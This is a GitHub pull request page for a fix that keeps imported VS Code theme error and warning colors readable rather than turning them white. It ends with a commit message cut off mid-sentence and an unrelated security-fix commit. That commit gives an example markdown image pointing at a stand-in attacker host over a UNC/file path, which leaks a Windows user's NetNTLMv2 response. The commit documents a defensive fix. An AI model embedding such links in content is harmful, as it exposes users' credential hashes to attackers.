Importing some VS Code themes leaves every destructive control blank: the close-terminal Confirm button and the composer stop button render as white with white text. With "Gruvbox Theme" (jdinhlife, from Open VSX), Gruvbox Dark Medium was saved with error: #ffffff.

The importer required error and warning to reach 4.5:1 against the editor background. When neither the theme's color nor the derived default passed, it fell back to pure white (black on light themes). Gruvbox Dark Medium sets editorError.foreground to #cc241d, which reaches 2.69:1 on its #282828 background, and the derived default #fb414a reaches 4.18:1, so the error color became white. That fallback works for text roles, but error also fills destructive buttons and the stop button, which always draw white text.

Status colors now keep their hue and only shift lightness until they reach 4.5:1 (readableThemeColorOn in themePalette.ts, built on the existing solveOklchLightness), so Gruvbox's #cc241d becomes #f95546. The helper returns the 8-bit color it measured, because the unrounded OKLCH value can drop just under 4.5:1 once stored. A status color hidden in the canvas (fully transparent) has no hue to keep, so the derived color is used, as before. Status colors that already passed are unchanged, and other roles still use readableOn.

Label contrast on destructive buttons is a separate, pre-existing limit. They draw hard-coded text-white on the error color, and no color reaches 4.5:1 against both a dark background like #282828 and white text. This PR takes Gruvbox Dark Medium's labels from 1:1 (white on white) to 3.27:1, close to the 3.53:1 of the built-in dark themes. Reaching 4.5:1 there would need a dedicated destructive-foreground role across all themes, so it's out of scope here.

This falls under the small-obvious-bug exception in CONTRIBUTING: one importer role mapping plus a helper, limited to the web importer (desktop wraps web; mobile doesn't import VS Code themes). Themes imported before this fix keep their stored white until they are re-imported or their Error color is edited in the theme editor.

Evidence

Before After
Close terminal dialog Before: close terminal dialog After: close terminal dialog
Composer stop button Before: composer stop button After: composer stop button

Before: the released desktop app with Gruvbox Dark Medium imported. After: a dev build of this branch with isolated state. I installed "Gruvbox Theme" from Open VSX (Settings → Appearance → Add theme) and selected Gruvbox Medium in dark mode. Running this branch's importer on that extension's gruvbox-dark-medium.json gives error: #f95546 on the same #282828 background.

Verification

  • New tests in apps/web/src/vscodeThemeImport.test.ts:
    • A dim red and amber (#fb4934 / #b57614) on a dark #282828 and a light #ffffff canvas. Each status color must reach 4.5:1 and keep its chroma and hue. On main they come out white or black (chroma 0).
    • A fully transparent editorError.foreground must fall back to the derived red.
  • vp test run src/vscodeThemeImport.test.ts src/themePalette.test.ts in apps/web: 74 passed, rebased on current main.
  • tsc-rs --noEmit for apps/web, plus vp lint and vp fmt --check on the touched files: clean.
  • Reviewed independently before opening. That review found the rounding and transparency cases, now fixed and covered above.

📝 Walkthrough

The theme palette adds contrast-based color adjustment. The VS Code theme importer uses it for error and warning colors. Tests verify contrast, chroma, hue, and transparent color handling.

Changes: Status color contrast

Layer / File(s) Summary
Theme color adjustment
apps/web/src/themePalette.ts
Adds readableThemeColorOn, which preserves valid readable colors and adjusts OKLCH lightness when the requested contrast is not met.
Importer integration and validation
apps/web/src/vscodeThemeImport.ts, apps/web/src/vscodeThemeImport.test.ts
The importer selects specified or derived status colors, then adjusts them to 4.5:1 contrast. Tests verify contrast, chroma, hue, and transparent input behavior.

Imported status colors can leave white labels on status-colored controls below normal-text contrast on dark canvases. This bounded, known limitation warrants owner awareness, but does not block merging.

lgollut force-pushed the fix/vscode-theme-status-colors branch from ced5f51 to 2f2cb59 Compare October 19, 2026 21:09
The VS Code importer gated error and warning on 4.5:1 contrast against
the editor background and fell back to pure white (or black) when
neither the file's color nor the derived one passed. Those roles also
fill destructive buttons and the composer stop button under white text,
so Gruvbox Dark Medium (editorError.foreground #cc241d at 2.69:1 on

A dim status color now keeps its hue and only shifts lightness until it
is readable, so Gruvbox's #cc241d becomes #f95546. The solver returns
the 8-bit color it measured, since the unrounded OKLCH can round just
under the target once stored. A status color hidden in the canvas has
no hue to keep, so the derived color stands in.

* Merge commit from fork

A markdown image such as ![x](file://attacker.test/share/cat.jpg), or a raw
\\host\share path, was classified as a host file. Rendering it asked the
server for a signed asset URL, and the server's realpath on the resulting UNC
path made Windows open an SMB session and send the user's NetNTLMv2 response
to the attacker's host, with no click and no tool call. File-link chips did
the same through filesystem.getMetadata, which stats every absolute path, and
storage cleanup stats the store paths in a worktree's pnpm manifest, which an
agent can write.

Network paths (two leading separators, as Windows reads them: \\h, //h, /\h)
now only resolve inside the thread's project, so projects on a share keep
working:

- clients block them in markdown images and stop treating them as file links
- the web stops asking for their metadata
- the server refuses them for media assets and file reads outside the
project, never stats one for metadata, and storage cleanup ignores a pnpm
  manifest that names one
- each check hands the filesystem the resolved path it approved, since
Windows reads a `\\?\` path as written, `..` included
